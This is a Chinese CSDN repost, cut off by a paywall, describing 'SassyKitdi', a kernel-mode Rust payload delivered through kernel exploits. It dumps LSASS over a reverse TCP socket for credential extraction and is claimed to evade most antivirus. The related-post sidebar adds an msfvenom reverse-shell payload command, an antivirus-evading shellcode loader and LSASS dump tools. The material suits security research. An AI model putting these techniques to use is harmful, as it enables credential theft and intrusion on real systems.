套接字读取到意外的eof_SassyKitdi:内核模式TCP套接字+LSASS转储

最新推荐文章于 2024-02-12 11:05:27 发布
最新推荐文章于 2024-02-12 11:05:27 发布
阅读量732 收藏 1
点赞数
文章标签: 套接字读取到意外的eof 将tcp封装为dll
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39746552/article/details/111278693
版权

b2e6904b543c4e00f4031ac46a7e0339.png

0x00 概述

本文主要介绍Windows NT的内核模式Payload,称为“SassyKitdi”(LSASS+Rootkit+TDI)。这种Payload可以通过远程内核漏洞利用(例如:EternalBlue、BlueKeep、SMBGhost)以及本地内核漏洞利用(例如:恶意驱动程序)进行部署。从Windows 2000到Windows 10,这个漏洞的Payload是通用的,在Payload中不再需要携带DKOM偏移量。 Payload与用户模式不会进行任何交互,并使用传输驱动程序接口(TDI)创建反向TCP套接字,该接口是更现代的Winsock内核(WSK)的前身。LSASS.exe进程内存和模块随后通过网络发送,这些信息将转换为minidump文件发送到攻击者一侧,并通过使用Mimikatz等工具提取用户凭据。 PoC位于: https://github.com/zerosum0x0/SassyKitdi 其中,位置无关的Shellcode大小约为3300字节,完全使用Rust编程语言编写,其中使用了许多高级抽象。在这里,我将描述使用Rust语言来实现Shellcode需求的一些优势,并说明需要采取的防范措施。 SassyKitdi方法的简化示意图: 7f0cad752d1a83cd49d07657614cb16e.png 我没有使用所有的反病毒软件对其进行测试,但是考虑到大多数反病毒软件都不会产生告警,因此我可以假设目前这种方法可以绕过大多数反病毒软件。 最后,我将讨论未来的内核模式Rootkit的外观,如果以本文的样本为例,还需要进行一些进一步的操作。这也正所谓是老瓶装新酒。  

0x01 传输驱动程序接口

TDI是与所有类型的网络传输进行通信的传统方式。使用这种方式,可以建立与攻击者的反向TCP连接。其他Payload(例如绑定套接字、UDP)将遵循类似的方法。 在Rootkit中,TDI的使用并不普遍,但在一些书中已经进行了详细的说明,这些书可以作为参考: Vieler, R. (2007). Professional Rootkits. Indianapolis, IN: Wiley Technology Pub.
Hoglund, G., & Butler, J. (2009). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ: Addison-Wesley.

1.1 打开TCP设备对象

根据设备名称(在示例中为\Device\Tcp)可以找到TDI设备对象。本质上,我们将ZwCreateFile()内核API与设备名称一起使用,并通过文件扩展属性来传递选项。 
    pub type ZwCreateFile = extern "stdcall" fn(        FileHandle:         PHANDLE,        AccessMask:         ACCESS_MASK,        ObjectAttributes:   POBJECT_ATTRIBUTES,        IoStatusBlock:      PIO_STATUS_BLOCK,        AllocationSize:     PLARGE_INTEGER,        FileAttributes:     ULONG,        ShareAccess:        ULONG,        CreateDisposition:  ULONG,        CreateOptions:      ULONG,        EaBuffer:           PVOID,        EaLength:           ULONG,    ) -> NTSTATUS;
最低0.47元/天 解锁文章
weixin_39746552
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rust-windows-shellcode:Rust的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法来自的项目 。 如何建造 (仅在Win10 x64上测试过) 构建shellcode二进制文件 rustup default nightly-x86_64-pc-windows-msvc cd shellcode/ cargo build --release 如果一切顺利,我们将获得shellcode\target\x86_64-pc-windows-msvc\release\shellcode.exe 转储.text部分并做一些补丁 我们在.text部分的开头打补丁,使其跳转到入口点。 这样,我们可以在合并部分存储一些字符串
套接字读取意外EOF
lvjingbin的博客
02-25 3927
上传文件遇到的问题以及报错 Processing of multipart/form-data request failed . java.io.EOFException: 套接字读取意外EOF 遇到这个问题可能有很多种,我们大胆的猜测以下几点 1.编码问题,两个环境的默认编码不一样,导致文件长度计算错误 2.大小写,windows文件名是不区分大小写的 3.依赖类库版本问题 如果上面几种情况排查了一下也没有问题,看一下你的路径是否存在,文件是否存在 我遇到的坑是在本地测试环境上有两个服务啊.
【Rust】使用Rust实现一个简单的shell
最新发布
数字人生
02-12 1554
在创建一个能和成熟shell(如bash或zsh)竞争的程序方面还有很长的路要走,但这个基本版本足够用于理解如何在Rust开始这类型的项目。:Rust拥有一个完善的工具链和生态系统,包括包管理器Cargo、文档生成器rustdoc、构建工具rustc等。:Rust内置了对并发编程的支持,通过其独特的所有权系统和借用检查器来防止数据竞争和其他并发问题。制作一个简单的shell是一项很好的学习项目,尤其是当涉及到Unix系统编程和Rust的系统级能力时。以下是一个使用Rust实现的简单shell的基础框架。
Rust免杀 Shellcode加载与混淆
y473158Yansu的博客
10-18 48
下面是实现AES-CFB加解密的代码,在加密的函数最终返回的是Hex编码后的字符串,而解密函数最终返回的是Vec数组,同样是为了方便在shellcode loader读取加密后的shellcode以及加载解密后的shellcode。下面是实现RC4加解密的代码,在加密的函数最终返回的是Base64编码后的字符串,而解密函数最终返回的是Vec数组,这是为了方便在shellcode loader读取加密后的shellcode以及加载解密后的shellcode。
上传文件时报Unexpected EOF异常的原因和解决方案
weixin_45528105的博客
03-15 1万+
上传文件时报Unexpected EOF异常的原因和解决方案 作者:陈镇坤27 日期:2022年3月15日 摘要:使用Apache的上传组件,部署服务后,前端上传文件,服务端与客户端建立socket连接,迟迟未接收到requestURI line,超过配置的时间时,会关闭tomcat线程connection,此时Apache组件会报Unexpected EOF错误。 思路历程:百度、谷歌异常解决方案,求证tomcat的connectionTimeOut的含义,查询连接与请求差异, 关键词:tomcat、ht
SassyKitdi内核模式TCP套接字+LSASS转储 .pdf
09-05
SassyKitdi内核模式TCP套接字+LSASS转储 web安全 应急响应 解决方案 安全研究 安全研究
SassyKitdi:内核模式TCP套接字+ LSASS转储(Rust Shellcode)
04-05
大多数感兴趣的代码在src / common / ntmem(LSASS转储)和src / common / nttdi(TCP套接字)库。 所有的结构,类型,函数签名等都在src / common / ntdef。 shellcode项目在src / payloads / sassykitdi。 ...
dump_lsass:一个dumpWindows系统lsass.exe进程的工具
03-11
dump_lsass 一个dumpWindows系统lsass.exe进程的工具 dump_lsass_for_Win7_x64.c和dump_lsass_for_Win10_x64.c是国外一位大佬写的lsass.exe进程转储工具,参考链接: ://osandamalith....
LsassSilentProcessExit:命令行界面通过SilentProcessExit将LSASS内存转储到磁盘
04-13
导致WerFault.exe将lsass.exe进程内存转储到磁盘以通过静默进程退出机制提取凭据而又不破坏lsass.exe的新方法。 Usage: LsassSilentProcessExit.exe <PID> Where DumpMode can be: 0 - Call ...
lsassdump_Lsass.exe_lsassexedump_lsass.dump_dump_dumphash_
09-29
dump lsass.exe 进程
MemLoad2Shellcode.rar
06-30
Shellcode框架+内存加载,支持行x86和x84,方便好用 ,debug 调试编写的shellcode功能,release下生成shellcode
Vs Code 配置rust环境(windows)
01-03
目录一、安装rust二、安装Vs Code插件 一、安装rust 下载rust工具: 点击下载rustup-init | ​win.rustup.rs 安装rust:打开rustup-init.exe 安装有2种选择,gnu或者msvc工具链 gnu(本文使用MinGW-w64)占用空间小(500M),对于初步的rust使用足够了。 msvc(本文使用Visual Studio Build Tools,包含msvc,clang等)占用空间大(2G)。 MinGW-w64安装:点击进入 ,找到x86_64-win32-seh下载后解压,在环境变量配置 ·解压目录/bin·,在cmd使用gc
black-hat-rust:使用Rust应用进攻性安全-早期访问-https
03-05
黑帽Rust-抢先体验 使用Rust编程语言深入研究攻击性安全 概括 不管是在电影还是在主流媒体,黑客通常都被浪漫化:他们被描绘成黑魔法师,讨厌的罪犯,或者在最坏的情况下被描绘成带有兜帽和撬棍的盗贼。 实际上,从无聊的少年探索互联网到主权国家的军队以及不满的前雇员,攻击者的形象范围非常大。 攻击者的动机是什么? 他们如何看起来如此容易地闯入任何网络? 他们如何对待受害者? 我们将戴上黑帽子,探索进攻性安全的世界,无论是网络攻击,网络犯罪还是网络战争。 扫描程序,漏洞利用,网络钓鱼工具包,植入物...从理论到实践,我们将探索进攻安全性的奥秘,并使用Rust编程语言(Stack Overflow最受欢迎的语言)连续五年来构建自己的进攻工具。 安全编程字段由其极大的范围定义(从shellcode到服务器和Web应用程序)。 由于其无与伦比的保证和功能集,Rust是一种期待已久的“一刀切”
windows平台下功能性shellcode的编写
11-12
windows平台下功能性shellcode的编写,通过高级语言编写shellcode
go-shellcode:将Shellcode加载到新进程
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
Oracle集群技术 | OLR与套接字文件(二)
woqutechteam的博客
01-25 394
上篇《Oracle集群技术 | 集群的自启动系列(一)》我们说到系统启动后由init.ohasd和ohasd两个脚本相互配合共同来完成集群的启动,当init.ohash前期工作准备完成,ohasd启动集群时需要首先读取olr文件,根据olr文件记录的信息启动集群的初始化资源层,并在该过程创建集群启动及运行时所需的套接字文件。   | OLR OLR文件记录的信息是ohasd守护进程启...
packets.go:32: unexpected EOF & write tcp 192.168.3.90:3306: broken pipe
txj236的专栏
08-12 5063
golang这边实现的连接池只提供了SetMaxOpenConns和SetMaxIdleConns方法进行连接池方面的配置。在使用的过程有一个问题就是数据库本身对连接有一个超时时间的设置,如果超时时间到了数据库会单方面断掉连接,此时再用连接池内的连接进行访问就会出错。 packets.go:32: unexpected EOF packets.go:118: write tcp 192.16
read: unexpected EOF
热门推荐
today_work的博客
09-21 2万+
上传文件时第一次ok,第二次就会报这个错误,此前上传文件一直没问题,从没报这种错误,后来是对比发现,原来是在执行打开文件代码的时候做了这一步: Intent intent = new Intent(CommonDefine.context, ToastService.class); intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);—这一句是新添加的,
任务管理器分别找到下列程序:winlogon.exe、lsass.exe、csrss.exe、smss.exe,试着结束它们,观察到的结果是
06-13
尝试结束lsass.exe进程可能会导致系统蓝屏崩溃并自动重启。 尝试结束csrss.exe进程可能会导致系统蓝屏崩溃并自动重启,或者导致系统无法正常运行。 尝试结束smss.exe进程可能会导致系统无法正常启动或运行。 因此...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值